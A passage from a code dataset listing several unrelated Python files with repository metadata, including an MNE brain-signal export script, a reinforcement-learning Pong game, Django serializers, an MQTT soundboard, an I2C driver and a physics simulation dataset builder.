zip(conds1 + conds2, epochs1 + epochs2)}\n else:\n epochs.equalize_event_counts(conds)\n \n if combine_conds:\n this_conds = [conds]\n else:\n this_conds = conds\n \n rois = []\n for i,roi_name in enumerate(roi_names):\n roi_path = '%s/%s/rois/%s.label' % (paths['cluster'], sub_ID, \n roi_name)\n roi_path_fsave = '%s/rois/%s.label' % (paths['cluster'], roi_name)\n if os.path.exists(roi_path):\n rois.append(mne.read_label(roi_path, subject=fs_id))\n elif os.path.exists(roi_path_fsave):\n if type(average_verts)==list:\n this_average_verts = average_verts[i]\n else:\n this_average_verts = average_verts\n if average_verts:\n roi = mne.read_label(roi_path_fsave, subject='fsaverageJA')\n rois.append(roi.copy().morph(subject_to=fs_id, \n subject_from='fsaverageJA',\n grade=verts,\n subjects_dir=paths['fs']))\n else:\n rois.append(mne.read_label(roi_path_fsave, subject='fsaverageJA'))\n\n \n else:\n rois.append(mne.read_labels_from_annot('fsaverageJA', \n parc='PALS_B12_Lobes', \n subjects_dir=paths['fs'], \n regexp=roi_name)[0])\n \n \n for cond in this_conds:\n print('\\nCondition: %s' % cond)\n if average_verts or 
all(average_verts):\n if cond=='all':\n this_epochs = epochs\n else:\n this_epochs = epochs[cond]\n stcs = mne.minimum_norm.apply_inverse_epochs(this_epochs, \n inverse_operator=inv, \n lambda2=lambda2, \n method=stc_method, \n pick_ori=pick_ori) \n tcs = mne.extract_label_time_course(stcs, rois, src, tc_extract)\n info = mne.create_info(roi_labels, sfreq)\n else:\n tcs = []\n labels = []\n for i,roi in enumerate(rois):\n if cond=='all':\n this_epochs = epochs\n else:\n this_epochs = epochs[cond]\n stcs = mne.minimum_norm.apply_inverse_epochs(this_epochs, \n inverse_operator=inv, \n lambda2=lambda2, \n method=stc_method, \n pick_ori=pick_ori)\n if average_verts[i]:\n tcs.append(mne.extract_label_time_course(stcs, roi, src, tc_extract))\n labels.append([roi.name[0:2]])\n else:\n # morph individual source estimate to freesurfer average brain\n morph = mne.compute_source_morph(src, fs_id, 'fsaverageJA',\n src_to=src_fsave, \n subjects_dir=paths['fs']) \n stcs = [morph.apply(stc) for stc in stcs]\n tcs.append([stc.in_label(roi).data for stc in stcs])\n labels.append([str(i) for i in range(tcs[i][0].shape[0])]) \n \n tcs = np.concatenate(tcs, axis=1)\n info = mne.create_info(list(np.concatenate(labels)), sfreq)\n \n \n # put time courses in mne data array \n data = mne.EpochsArray(tcs, info, tmin=-0.5, baseline=(-0.5, 0))\n if combine_conds:\n cond = ('_').join(cond)\n data.save('%s/%s_%s_%d-%dms_%d-%dHz-epo.fif' % (cluster_path, save_prefix, cond,\n int(this_epochs.tmin * 1000),\n int(this_epochs.tmax * 1000),\n int(this_epochs.info['highpass']),\n int(this_epochs.info['lowpass'])), overwrite=True)\n","repo_name":"alhoj/ASD","sub_path":"export_ROI_timecourses.py","file_name":"export_ROI_timecourses.py","file_ext":"py","file_size_in_byte":7903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72556844852","text":"import pygame\nimport random\nimport math\nfrom pygame.locals import (\n K_UP,\n K_DOWN,\n K_LEFT,\n K_RIGHT,\n K_r,\n K_ESCAPE,\n KEYDOWN,\n QUIT,\n)\nimport numpy as np\nfrom enum import IntEnum\nimport gym\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten\nfrom tensorflow.keras.optimizers import Adam\nfrom rl.agents import DQNAgent\nfrom rl.policy import BoltzmannQPolicy\nfrom rl.memory import SequentialMemory\nfrom gym import error, spaces\nimport copy\nimport argparse\nimport sys\n\nWIDTH = 512\nHEIGHT = 512\nPLAT_WIDTH = 16\nPLAT_HEIGHT = 80\nPLAT_BORDER_OFFSET = 8\nENEMY_PLAT_COLOR = (255, 255, 255)\nPLAYER_PLAT_COLOR = (255, 255, 255)\nPLAT_SPEED = 3.3\nBALL_SPEED = 6\nBALL_COLOR = (255, 0, 0)\nBALL_RADIUS = 8\nBOUNDS = {\n 'left': 0,\n 'right': WIDTH,\n 'top': 0,\n 'bottom': HEIGHT,\n}\nMODEL_FILE = 'dqn_weights.h5f'\nBALL_BOUNCE_Y_ANGLE = BALL_SPEED\nPADDING = 5\n\nclass Difficulty(IntEnum):\n Easy = 0\n Hard = 1\n\nstate = {\n 'enemy_pos': None,\n 'player_pos': None,\n 'player_vel': None,\n 'ball_pos': None,\n 'ball_vel': None,\n 'enemy_score': 0,\n 'player_score': 0,\n 'difficulty': Difficulty.Hard,\n}\n\ndef respawn_ball():\n state['ball_pos'] = [int(WIDTH / 2), int(HEIGHT / 2)]\n K = 0.05\n state['ball_vel'] = pygame.math.Vector2([\n random.choice([-1, 1]) * random.uniform(0.5, 1.0) * 2 * BALL_SPEED,\n random.uniform(0.0, 0.25) * 2 * BALL_BOUNCE_Y_ANGLE,\n ])\n\ndef reset():\n state['enemy_pos'] = [\n PLAT_BORDER_OFFSET,\n int(HEIGHT / 2)\n ]\n state['player_pos'] = [\n WIDTH - PLAT_BORDER_OFFSET - PLAT_WIDTH,\n int(HEIGHT / 2)\n ]\n state['player_vel'] = 
PLAT_SPEED\n    respawn_ball()\n    state['player_score'] = 0\n    state['enemy_score'] = 0\n\ndef player_move_up():\n    new_y = state['player_pos'][1] - PLAT_SPEED\n    if new_y <= 0:\n        state['player_pos'][1] = 0\n    else:\n        state['player_pos'][1] = new_y\n\ndef player_move_down():\n    new_y = state['player_pos'][1] + PLAT_HEIGHT + PLAT_SPEED\n    if new_y >= HEIGHT:\n        state['player_pos'][1] = HEIGHT - PLAT_HEIGHT\n    else:\n        state['player_pos'][1] += PLAT_SPEED\n\ndef collides_with_platform(ball_pos, platform, mod):\n    p_startx = platform[0]\n    p_endx = p_startx + PLAT_WIDTH\n    p_starty = platform[1]\n    p_endy = p_starty + PLAT_HEIGHT\n    bp = [ball_pos[0] + mod * BALL_RADIUS, ball_pos[1] + BALL_RADIUS]\n    if mod == 1:\n        collides_x = bp[0] >= p_startx\n    else:\n        collides_x = bp[0] <= p_endx\n    collides_y = bp[1] >= p_starty and bp[1] <= p_endy\n    collides = collides_x and collides_y\n    return collides\n\ndef update():\n    # Update enemy pos\n    if state['difficulty'] == Difficulty.Easy:\n        state['enemy_pos'][1] += (state['ball_pos'][1] - state['enemy_pos'][1]) / random.uniform(2, 5)\n    else:\n        d = (state['ball_pos'][1] - state['enemy_pos'][1])\n        k = 1 if d > 0 else -1 if d < 0 else 0\n        state['enemy_pos'][1] += k * PLAT_SPEED\n    if state['enemy_pos'][1] <= 0:\n        state['enemy_pos'][1] = 0\n    elif state['enemy_pos'][1] + PLAT_HEIGHT >= HEIGHT:\n        state['enemy_pos'][1] = HEIGHT - PLAT_HEIGHT\n\n    bpmrx = state['ball_pos'][0] - BALL_RADIUS\n    bpprx = state['ball_pos'][0] + BALL_RADIUS\n    bpmry = state['ball_pos'][1] - BALL_RADIUS\n    bppry = state['ball_pos'][1] + BALL_RADIUS\n\n    if bpmrx < BOUNDS['left']:\n        # enemy loss\n        state['player_score'] += 1\n        respawn_ball()\n\n    if (bpprx > BOUNDS['right']):\n        # player loss\n        state['enemy_score'] += 1\n        respawn_ball()\n\n    if (bpmry < BOUNDS['top']) or (bppry > BOUNDS['bottom']):\n        state['ball_vel'].y *= -1\n\n    if collides_with_platform(state['ball_pos'], state['player_pos'], 1):\n        # flip the horizontal direction only; multiplying by -1 * BALL_SPEED\n        # compounded the speed on every paddle hit and made the ball diverge\n        state['ball_vel'].x *= -1\n        state['ball_vel'].y = random.uniform(-BALL_BOUNCE_Y_ANGLE, BALL_BOUNCE_Y_ANGLE)\n    elif collides_with_platform(state['ball_pos'], state['enemy_pos'], -1):\n        state['ball_vel'].x *= -1\n        state['ball_vel'].y = random.uniform(-BALL_BOUNCE_Y_ANGLE, BALL_BOUNCE_Y_ANGLE)\n\n    # print('ball velocity: {}'.format(state['ball_vel']))\n    state['ball_pos'][0] += state['ball_vel'].x\n    state['ball_pos'][1] += state['ball_vel'].y\n\npygame.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nenemy_surf = pygame.Surface((PLAT_WIDTH, PLAT_HEIGHT))\nenemy_surf.fill(ENEMY_PLAT_COLOR)\nplayer_surf = pygame.Surface((PLAT_WIDTH, PLAT_HEIGHT))\nplayer_surf.fill(PLAYER_PLAT_COLOR)\nfont = pygame.font.Font(pygame.font.get_default_font(), 18)\ndef render(state):\n    # Reset screen\n    screen.fill((0, 0, 0))\n    # Opponent platform\n    screen.blit(enemy_surf, (state['enemy_pos'][0], state['enemy_pos'][1]))\n    # Player platform\n    screen.blit(player_surf, (state['player_pos'][0], state['player_pos'][1]))\n    # Ball\n    pygame.draw.circle(\n        screen,\n        BALL_COLOR,\n        (state['ball_pos'][0], state['ball_pos'][1]),\n        BALL_RADIUS\n    )\n    # Render text\n    en_text_surface = font.render('Enemy: {}'.format(state['enemy_score']), True, (255, 255, 255))\n    en_text_rect = en_text_surface.get_rect()\n    en_text_rect.topleft = (PADDING, PADDING)\n    screen.blit(en_text_surface, en_text_rect)\n    player_text_surface = font.render('Player: {}'.format(state['player_score']), True, (255, 255, 255))\n    player_text_rect = player_text_surface.get_rect()\n    player_text_rect.topright = (WIDTH - PADDING, PADDING)\n    
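# blit the player's score at the top-right (the enemy score sits at top-left); the display buffer is flipped right after\n    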
screen.blit(player_text_surface, player_text_rect)\n pygame.display.flip()\n\ndef run_game():\n running = True\n reset()\n clock = pygame.time.Clock()\n while running:\n # Process events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n elif event.key == K_r:\n reset()\n keys = pygame.key.get_pressed()\n if keys[K_UP]:\n player_move_up()\n elif keys[K_DOWN]:\n player_move_down()\n update()\n render(state)\n clock.tick(60)\n pygame.quit()\n\nclass Action(IntEnum):\n Up = 0\n Down = 1\n DoNothing = 2\n\nclass PongEnv(gym.Env):\n K = 5\n ACTION_TO_FUN_MAPPING = {\n Action.Up: player_move_up,\n Action.Down: player_move_down,\n Action.DoNothing: lambda: None,\n }\n\n def __init__(self):\n self.action_space = spaces.Discrete(len(list(PongEnv.ACTION_TO_FUN_MAPPING.keys())))\n # self.state = np.array(list(state.values()))\n\n @staticmethod\n def state_diff(new_state, old_state):\n return new_state['player_score'] - old_state['player_score']\n\n def get_state(self):\n global state\n return state\n\n @staticmethod\n def state_to_input_repr(state):\n s = np.array([\n state['enemy_pos'][0],\n state['enemy_pos'][1],\n state['player_pos'][0],\n state['player_pos'][1],\n state['ball_pos'][0],\n state['ball_pos'][1],\n state['ball_vel'][0],\n state['ball_vel'][1],\n ])\n return s\n\n def perform_action(self, action):\n global state\n PongEnv.ACTION_TO_FUN_MAPPING[action]()\n\n def reset(self):\n reset()\n state = self.get_state()\n return PongEnv.state_to_input_repr(state)\n\n def render(self, mode='human'):\n render(self.get_state())\n\n def step(self, action):\n # print(\"step(): {}\".format(action))\n self.perform_action(action)\n # print(\"TAKING ACTION: \", action)\n update()\n state = self.get_state()\n reward = state['player_score'] - state['enemy_score']\n done = abs(state['player_score'] - state['enemy_score']) >= PongEnv.K\n return PongEnv.state_to_input_repr(state), reward, done, {}\n\n def clone_state(self):\n return copy.deepcopy(state)\n\n def restore_state(self, state_):\n global state\n state = copy.deepcopy(state_)\n\n def clone_full_state(self):\n return copy.deepcopy(state)\n\n def restore_full_state(self, state_):\n global state\n state = copy.deepcopy(state_)\n\n# Model\ndef setup_model(env):\n model = Sequential()\n state_param_amount = 8\n actions_amount = env.action_space.n\n print(env.action_space.n)\n model.add(Flatten(input_shape=(1, state_param_amount)))\n model.add(Dense(24, activation='relu'))\n model.add(Dense(24, activation='relu'))\n model.add(Dense(actions_amount, activation='linear'))\n return model\n\n# Agent\ndef setup_agent(env, model):\n actions_amount = env.action_space.n\n policy = BoltzmannQPolicy()\n memory = SequentialMemory(limit=50000, window_length=1)\n dqn = DQNAgent(model=model, memory=memory, policy=policy,\n nb_actions=actions_amount, nb_steps_warmup=10, target_model_update=1e-2)\n dqn.compile(Adam(lr=1e-3), metrics=['mae'])\n return dqn\n\ndef train():\n env = PongEnv()\n model = setup_model(env)\n dqn = setup_agent(env, model)\n dqn.fit(env, nb_steps=50000, visualize=False, verbose=1)\n dqn.save_weights(MODEL_FILE, overwrite=True)\n\ndef run_model():\n env = PongEnv()\n model = setup_model(env)\n dqn = setup_agent(env, model)\n dqn.load_weights(MODEL_FILE)\n dqn.test(env, nb_episodes=50, visualize=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', action='store_true', default=False)\n 
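# three run modes below: --train fits the DQN and saves the weights, --play starts the keyboard-controlled game, and the default branch loads the saved weights and runs the trained agent\n    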
parser.add_argument('--play', action='store_true', default=False)\n    args = parser.parse_args()\n    if args.train:\n        print(\"Training\")\n        train()\n    elif args.play:\n        run_game()\n    else:\n        print(\"Running saved model\")\n        run_model()\n","repo_name":"comonadd/pong-rl","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20913012746","text":"# named slice\n\nrecord = '....................100 .......513.25 ..........'\ncost1 = int(record[20:23]) * float(record[31:37])\n\nSHARES = slice(20, 23)\nPRICE = slice(31, 37)\ncost2 = int(record[SHARES]) * float(record[PRICE])\n\na = slice(5, 50, 2)\nprint(a.start, a.stop, a.step)\n\n# slice.indices\ns = 'HelloWorld'\nprint(a.indices(len(s))) # indices() clamps the stop to len(s): (5, 10, 2)\nfor i in range(*a.indices(len(s))):\n    print(i, s[i])\n","repo_name":"ljy95135/PythonCookBook3","sub_path":"data_structure/ds1_11_slice_for_hard_code.py","file_name":"ds1_11_slice_for_hard_code.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11805213263","text":"\"\"\"Request and response handling for the titles database.\"\"\"\n\nfrom rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\n\nimport datetime as dt\n\nfrom .models import GenreTitle, Titles, Genres, Categories, Author\n\n\nclass AuthorSerializer(serializers.ModelSerializer):\n    \"\"\"Displays author information (kept separate for future extension).\"\"\"\n\n    titles = serializers.SlugRelatedField(\n        slug_field='title',\n        many=True,\n        allow_null=True,\n        read_only=True\n    )\n\n    class Meta:\n        model = Author\n        fields = ('slug', 'titles',)\n\n\nclass GenresSerializer(serializers.ModelSerializer):\n    \"\"\"Genres, description.\"\"\"\n\n    class Meta:\n        model = Genres\n        fields = ('genre',)\n\n\nclass CategoriesSerializer(serializers.ModelSerializer):\n    \"\"\"Categories, description.\"\"\"\n\n    class Meta:\n        model = Categories\n        fields = '__all__'\n\n\nclass TitlesSerializer(serializers.ModelSerializer):\n    \"\"\"Main serializer for retrieving title information.\"\"\"\n\n    category = serializers.SlugRelatedField(\n        slug_field='slug',\n        many=False,\n        queryset=Categories.objects.all()\n    )\n    genres = GenresSerializer(many=True, required=False)\n    author = serializers.SlugRelatedField(\n        slug_field='slug',\n        many=False,\n        queryset=Author.objects.all()\n    )\n    year = serializers.SerializerMethodField()\n\n    class Meta:\n        fields = ('pk', 'title', 'author', 'year', 'category', 'genres')\n        model = Titles\n        validators = [\n            UniqueTogetherValidator(\n                queryset=Titles.objects.all(),\n                fields=('title', 'author', 'category')\n            )\n        ]\n\n    def validate_year(self, value):\n        year = dt.date.today().year\n        if value > year:\n            raise serializers.ValidationError('Check the year')\n        return value\n\n    def create(self, validated_data):\n        \"\"\"Check whether genres were supplied and attach them.\"\"\"\n        if 'genres' not in self.initial_data:\n            title = Titles.objects.create(**validated_data)\n            return title\n        genres = validated_data.pop('genres')\n        title = Titles.objects.create(**validated_data)\n        for genre in genres:\n            current_genre, status = Genres.objects.get_or_create(**genre)\n            GenreTitle.objects.create(genre=current_genre, title=title)\n\n        return 
title\n","repo_name":"Vinsya87/bookish-potato","sub_path":"api_yamdb/composition/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9800310614","text":"import tensorflow as tf\n\nclass DQNetwork:\n    def __init__(self, action_size, learning_rate, name='DQNetwork'):\n        self.state_size = [1, 4, 4]\n        self.action_size = action_size\n        self.learning_rate = float(learning_rate)\n\n        with tf.variable_scope(name):\n            # We create the placeholders\n            # [None, 1, 4, 4]: None leaves the batch dimension open,\n            # and the remaining dimensions match state_size above\n            self.inputs_ = tf.placeholder(tf.float32, [None, 1, 4, 4], name=\"inputs\")\n            self.actions_ = tf.placeholder(tf.float32, [None, action_size], name=\"actions_\")\n\n            # Remember that target_Q is the R(s,a) + ymax Qhat(s', a')\n            self.target_Q = tf.placeholder(tf.float32, [None], name=\"target\")\n\n\n            self.flatten = tf.layers.flatten(self.inputs_)\n            ## --> [16]\n\n            self.fc1 = tf.layers.dense(inputs=self.flatten,\n                                  units=32,\n                                  activation=tf.nn.elu,\n                                  kernel_initializer=tf.contrib.layers.xavier_initializer(),\n                                  name=\"fc1\")\n\n            # feed fc1 into fc2; this layer previously took self.flatten, which left fc1 unused\n            self.fc2 = tf.layers.dense(inputs=self.fc1,\n                                  units=64,\n                                  activation=tf.nn.elu,\n                                  kernel_initializer=tf.contrib.layers.xavier_initializer(),\n                                  name=\"fc2\")\n\n            self.output = tf.layers.dense(inputs=self.fc2,\n                                  kernel_initializer=tf.contrib.layers.xavier_initializer(),\n                                  units=action_size,\n                                  activation=None)\n\n            # Q is our predicted Q value.\n            self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_), axis=1)\n\n            # The loss is the difference between our predicted Q_values and the Q_target\n            # Sum(Qtarget - Q)^2\n            self.loss = tf.reduce_mean(tf.square(self.target_Q - self.Q))\n\n            self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)\n","repo_name":"cyberphantom/Selfie-Drone-Stick","sub_path":"script/lib/dqnet.py","file_name":"dqnet.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"13991454267","text":"#!/usr/bin/env python\n\nimport os\nimport math\nimport sys\nimport logging\n\nfrom Generator_Utils import *\nfrom OCO_MathUtil import *\nfrom OCO_TextUtils import index_range_list, evaluate_bool_str\nfrom OCO_Matrix import OCO_Matrix\n\nimport numpy\nimport random\n\n# For consistency if random values are used in 'modify' statement\nrandom.seed(sys.argv[0])\n\nimport copy as copy_module\n\ndef Process_File(source, destination, fileKeywords, moduleSections, valuesDict, mapDict):\n    logger = logging.getLogger(os.path.basename(__file__))\n\n    # Load existing file\n    matrix_obj = OCO_Matrix(source)\n\n    for modifySect in moduleSections:\n\n        # Add ability to specify cols individually or using a * to goto end\n        columns = Apply_Template(modifySect.Get_Keyword_Value('columns'), valuesDict, mapDict=mapDict)\n        rows = Apply_Template(modifySect.Get_Keyword_Value('rows'), valuesDict, mapDict=mapDict)\n        modify = modifySect.Get_Keyword_Value('modify')\n        delete = evaluate_bool_str( modifySect.Get_Keyword_Value('delete') )\n        add_column = evaluate_bool_str( modifySect.Get_Keyword_Value('add_column') )\n\n        if columns != None:\n            try:\n                columns = index_range_list(columns, max_value=matrix_obj.dims[1])\n            except:\n                if not isinstance(columns, list):  # was 'type(columns) is ListType', a Python 2 name that was never imported\n                    col_name_list = [columns]\n                else:\n                    col_name_list = columns\n\n                columns = []\n                for curr_name in col_name_list:\n                    if 
curr_name.lower() not in matrix_obj.labels_lower:\n                        if add_column:\n                            matrix_obj.add_column(curr_name)\n                            columns.append( matrix_obj.dims[1] - 1 )\n                        else:\n                            raise IOError('Column named %s not found in file: %s' % (curr_name, source))\n                    else:\n                        # only look up columns that already existed; newly added ones were appended above\n                        columns.append( matrix_obj.labels_lower.index(curr_name.lower()) )\n        else:\n            columns = range(matrix_obj.dims[1])\n\n        if rows != None:\n            rows = index_range_list(rows, max_value=matrix_obj.dims[0])\n        else:\n            rows = range(matrix_obj.dims[0])\n\n        if delete and modify != None:\n            raise ValueError('delete and modify keywords can not be specified together')\n\n        if delete:\n            if len(columns) > matrix_obj.dims[1]:\n                raise IOError('More columns to be deleted %d than exist %d in input file %s' % (len(columns), matrix_obj.dims[1], source))\n\n            new_data = numpy.zeros((matrix_obj.dims[0], matrix_obj.dims[1]-len(columns)), dtype=numpy.double)\n            new_labels = []\n            new_units = []\n\n            new_col_idx = 0\n            for old_col_idx in range(matrix_obj.dims[1]):\n                if old_col_idx not in columns:\n                    new_labels.append(matrix_obj.labels[old_col_idx])\n                    new_units.append(matrix_obj.units[old_col_idx])\n\n                    new_data[:,new_col_idx] = matrix_obj.data[:,old_col_idx]\n\n                    new_col_idx += 1\n\n            matrix_obj.data = new_data\n            matrix_obj.labels = new_labels\n            matrix_obj.units = new_units\n\n        if modify != None and len(modify) > 0:\n\n            modifyDict = copy_module.copy(valuesDict)\n\n            Get_Constant_Values(modifySect.Get_Section('->CONSTANTS'), modifyDict)\n\n            for row_idx in rows:\n                for col_idx in columns:\n                    modifyDict['original'] = str(matrix_obj.data[row_idx][col_idx])\n\n                    modify_str = Apply_Template(modify, modifyDict, mapDict=mapDict)\n\n                    try:\n                        matrix_obj.data[row_idx][col_idx] = eval(modify_str)\n                    except:\n                        raise RuntimeError('Error evaluating modify string: \"%s\"' % modify_str)\n\n    matrix_obj.write(destination, auto_size_cols=False)\n    \n","repo_name":"nasa/RtRetrievalFramework","sub_path":"deprecated/generator/modules/modify_data.py","file_name":"modify_data.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"21"} +{"seq_id":"71336380214","text":"'''\r\nMQTT Computer\r\nAuthor: Sawyer Travis (sjt29)\r\nPlays music files based on MQTT messages\r\n'''\r\nimport paho.mqtt.client as mqtt\r\nfrom playsound import playsound\r\n\r\n# Constants\r\nPORT = 1883\r\nQOS = 0\r\n\r\n# Set hostname for MQTT broker\r\nBROKER = 'mqtt.eclipseprojects.io'\r\n\r\n# Callback when connecting to the MQTT broker\r\ndef on_connect(client, userdata, flags, rc):\r\n    print(\"Connected with result code \" + str(rc))\r\n    client.subscribe(\"hacks/keypad\", qos=QOS)\r\n\r\n# Callback when client receives a PUBLISH message from the broker\r\ndef on_message(client, data, msg):\r\n    if msg.topic == 'hacks/keypad':\r\n        message = msg.payload\r\n        print(f'Received message: Key = {message}')\r\n        sound = \"\"\r\n        if message == b'0' :\r\n            sound = \"audio/pls-dont-click-By-Tuna.mp3\"\r\n        elif message == b'1' :\r\n            sound = \"audio/emotional-damage-meme.mp3\"\r\n        elif message == b'2' :\r\n            sound = \"audio/k.o.-sound-effect-By-Tuna.mp3\"\r\n        elif message == b'3' :\r\n            sound = \"audio/anime-wow-sound-effect.mp3\"\r\n        elif message == b'4' :\r\n            sound = \"audio/metal-pipe-falling-By-Tuna.mp3\"\r\n        elif message == b'5' :\r\n            sound = \"audio/fortnite-default-dance-bass-boosted.mp3\"\r\n        elif message == b'6' :\r\n            sound = \"audio/kowalski-analysis.mp3\"\r\n        elif message == b'7' :\r\n            sound = \"audio/bruh.mp3\"\r\n        elif message == b'8' :\r\n            sound = 
\"audio/tim_and_eric_it_s_free_real_estate.mp3\"\r\n elif message == b'9' :\r\n sound = \"audio/vine-boom.mp3\"\r\n elif message == b'a' :\r\n sound = \"audio/maro-jump-sound-effect_1.mp3\"\r\n elif message == b'b' :\r\n sound = \"audio/lego-breaking.mp3\"\r\n elif message == b'c' :\r\n sound = \"audio/loud-noti.mp3\"\r\n elif message == b'd' :\r\n sound = \"audio/nfl.mp3\"\r\n elif message == b'e' :\r\n sound = \"audio/obi-wan-hello-there.mp3\"\r\n elif message == b'f' :\r\n sound = \"audio/generalkenobi.mp3\"\r\n\r\n # play sound if it exists\r\n if sound != \"\" :\r\n print(\"Playing sound: \" + sound)\r\n playsound(sound, 0)\r\n print(\"Sound finished\")\r\n\r\n# Setup MQTT client and callbacks\r\nclient = mqtt.Client()\r\nclient.on_connect = on_connect\r\nclient.on_message = on_message\r\n\r\n# Connect to MQTT broker and subscribe to the button topic\r\nclient.connect(BROKER, PORT, 60)\r\nclient.loop_forever()","repo_name":"bdkopen/CalvinHacks-2023","sub_path":"mqtt-computer.py","file_name":"mqtt-computer.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21137902036","text":"from machine import I2C as _I2C\nfrom machine import Pin\nfrom board import i2cPorts\n\n\nclass I2C:\n \"\"\"Custom I2C Class for RP2040\"\"\"\n\n # This init seems to work for micropythn (untested)\n def __init__(self, scl, sda, *, frequency=100000):\n\n for portId, portScl, portSda in i2cPorts:\n try:\n if scl == portScl and sda == portSda:\n # Set-up I2C device using normal micropython syntax:\n self._i2c = _I2C(portId, sda=sda, scl=scl, freq=frequency)\n break\n except RuntimeError:\n pass\n else:\n raise ValueError(\n \"No Hardware I2C on (scl,sda)={}\\nValid I2C ports: {}\".format(\n (scl, sda), i2cPorts\n )\n )\n \n # Haven't dove into these methods yet - JW\n def scan(self):\n \"\"\"Perform an I2C Device Scan\"\"\"\n return self._i2c.scan()\n\n def writeto(self, address, buffer, *, stop=True):\n \"Write data to the address from the buffer\"\n return self._i2c.writeto(address, buffer, stop)\n\n def readfrom_into(self, address, buffer, *, stop=True):\n \"\"\"Read data from an address and into the buffer\"\"\"\n return self._i2c.readfrom_into(address, buffer, stop)\n\n def writeto_then_readfrom(\n self,\n address,\n buffer_out,\n buffer_in,\n *,\n out_start=0,\n out_end=None,\n in_start=0,\n in_end=None,\n stop=False,\n ):\n \"\"\"Write data from buffer_out to an address and then\n read data from an address and into buffer_in\n \"\"\"\n if out_end:\n self.writeto(address, buffer_out[out_start:out_end], stop=stop)\n else:\n self.writeto(address, buffer_out[out_start:], stop=stop)\n\n if not in_end:\n in_end = len(buffer_in)\n read_buffer = memoryview(buffer_in)[in_start:in_end]\n self.readfrom_into(address, read_buffer, stop=stop)\n\n\n","repo_name":"JonWakefield/Circuit-Python-to-Micro-Python-drivers","sub_path":"Drivers/i2c.py","file_name":"i2c.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16564681453","text":"#!/usr/bin/env python3\n\n# Imports.\nimport numpy as np\nimport pathlib\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport ipywidgets as widgets\nfrom ipywidgets import interact, interact_manual, fixed\nimport seaborn as sns\nimport sys\nimport yaml\nfrom time import process_time\nimport argparse\nfrom pathlib import Path\nimport shutil\nimport scipy.special as ss\n\n# 
Additional settings.\npd.set_option(\"display.max_rows\", 500)\npd.set_option(\"display.max_columns\", 500)\n\nfrom he6_cres_deep_learning.daq import DAQ, Config\n\n\ndef main():\n \"\"\"\n A script for running an experiment based on a dictionary input (in\n the form of a json file). See\n `/he6-cres-spec-sims/config_files/rocks_exp_config_example.json` for\n an example of what it needs to contain.\n\n Args:\n local_dir (str): where to put experiment results. Ideally on a\n harddrive.\n sim_exp_name (str): name of the experiment (identical to name of\n .json that defines experiment).\n \"\"\"\n\n # Parse command line arguments.\n par = argparse.ArgumentParser()\n arg = par.add_argument\n arg(\n \"-c\",\n \"--config_path\",\n type=str,\n help=\"Path to the base daq config file to copy.\",\n )\n arg(\n \"-gn\",\n \"--gain_noise_path\",\n type=str,\n help=\"Path to the gain_noise file to copy for setting the gain and noise mean of the data file.\",\n )\n arg(\n \"-n_files\",\n \"--n_files\",\n type=int,\n help=\"number of files to build in dataset. \",\n )\n arg(\n \"-n_events\",\n \"--n_events_per_file\",\n type=int,\n help=\"average number of events per file.\",\n )\n arg(\n \"-len\",\n \"--spec_length\",\n type=float,\n help=\"length of spec file in seconds.\",\n )\n arg(\n \"-seed\",\n \"--random_seed\",\n type=int,\n default=123456,\n help=\"random seed used to generate the spec files.\",\n )\n\n arg(\n \"-sanity_check\",\n \"--sanity_check\",\n type=bool,\n default=False,\n help=\"if true plots of the first file created will be presented.\",\n )\n\n args = par.parse_args()\n\n build_sideband_training_ds(\n args.config_path,\n args.gain_noise_path,\n args.n_files,\n args.n_events_per_file,\n args.spec_length,\n args.random_seed,\n args.sanity_check,\n )\n\n return None\n\n\ndef build_sideband_training_ds(\n config_path, gain_noise_path, n_files, n_events_per_file, spec_length, random_seed, sanity_check\n):\n\n print(f\"\\n\\n\\n Building snr oscillation dataset.\\n\\n\\n\")\n\n # ---- Copy base config ----\n name = \"sideband_ds\"\n config_path = Path(config_path)\n config_path_sideband = config_path.with_name(\n name + config_path.suffix\n )\n shutil.copyfile(str(config_path), str(config_path_sideband))\n\n # ---- Copy then alter base noise_gain file to make it simpler. 
